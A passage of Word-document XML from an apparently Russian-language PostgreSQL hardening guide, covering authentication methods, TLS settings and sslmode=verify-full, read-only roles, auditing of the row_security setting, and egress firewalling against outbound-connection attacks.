          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — никогда для non-loopback. Auth-bypass прямо в конфиге.</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password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — старый md5-hash protocol, vulnerable к offline cracking. Заменить на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 14+).</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scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — текущий standard. Требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password_encryption = scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в postgresql.conf.</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cert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — client-cert authentication. Подходит для service-to-service.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peer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unix socket + OS-user matching. Подходит для local DBA-tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Финальная строка `host all all 0.0.0.0/0 reject`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — explicit reject, чтобы случайно открытый порт не получил implicit accept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL / TLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_cert_file = 'server.crt'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_key_file = 'server.key'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_ca_file = 'root.crt'                # для client-cert auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_min_protocol_version = 'TLSv1.2'    # запрет старого TLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_prefer_server_ciphers = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl_ciphers = 'HIGH:!aNULL:!MD5:!3DES:!RC4'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Клиент-сторона — обязательно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=verify-full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для production-connections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># psycopg connection string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"postgresql://app_role@db.example.com/app_db?sslmode=verify-full&amp;sslrootcert=/etc/ssl/postgres/ca.crt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=verify-full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывает CVE-2024-10977 (R10, libpq MITM): handshake происходит до того, как клиент примет любой error response, и certificate validation отсечёт MITM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без verify-full — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> защищает от MITM (handshake происходит, но без проверки cert).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Read-only ролей: default_transaction_read_only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для API-ролей, которые должны только читать:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE app_read SET default_transaction_read_only = on;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE app_read SET default_transaction_isolation = 'read committed';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Любая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT/UPDATE/DELETE/CREATE/TRUNCATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от роли вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: cannot execute INSERT in a read-only transaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Защита от 3.5 stacked queries (вторая команда не выполнится) и от 3.10.1 data-modifying CTE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Снять для конкретной транзакции — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN ISOLATION LEVEL ...</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SET LOCAL transaction_read_only = off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если у роли есть право). Если права нет — фундаментальная защита.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security GUC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security = on    # default</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`on`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS-policy применяется. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`off`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS бypass (только для owner и superuser, у не-owner вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: insufficient privilege</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В application-роли проверять, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если кто-то выставил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на per-role / per-DB уровне:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname, rolconfig FROM pg_roles WHERE rolconfig::text LIKE '%row_security%';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Любое значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в rolconfig — потенциальный RLS bypass. Audit и REVOKE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита от 3.5 (stacked queries): на уровне сервера невозможна</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер всегда поддерживает мульти-команды в simple query (см. 2.1). Конфиг сам по себе не закрывает 3.5 — только default_transaction_read_only ограничивает class команд, доступных во второй команде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Основная защита — на уровне драйвера (extended protocol, 5.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита от 3.6 (OOB / SSRF): сетевой уровень</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL сам по себе не может полностью защититься от outbound connections через расширения. Защита — на уровне сети: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Egress firewall: PostgreSQL host не должен иметь право устанавливать TCP-соединения наружу (кроме разрешённого whitelist — backup storage, monitoring).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VPC / network segmentation: PostgreSQL в private subnet без internet egress.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ограничивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inbound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не outbound.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные конфиги расширений:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
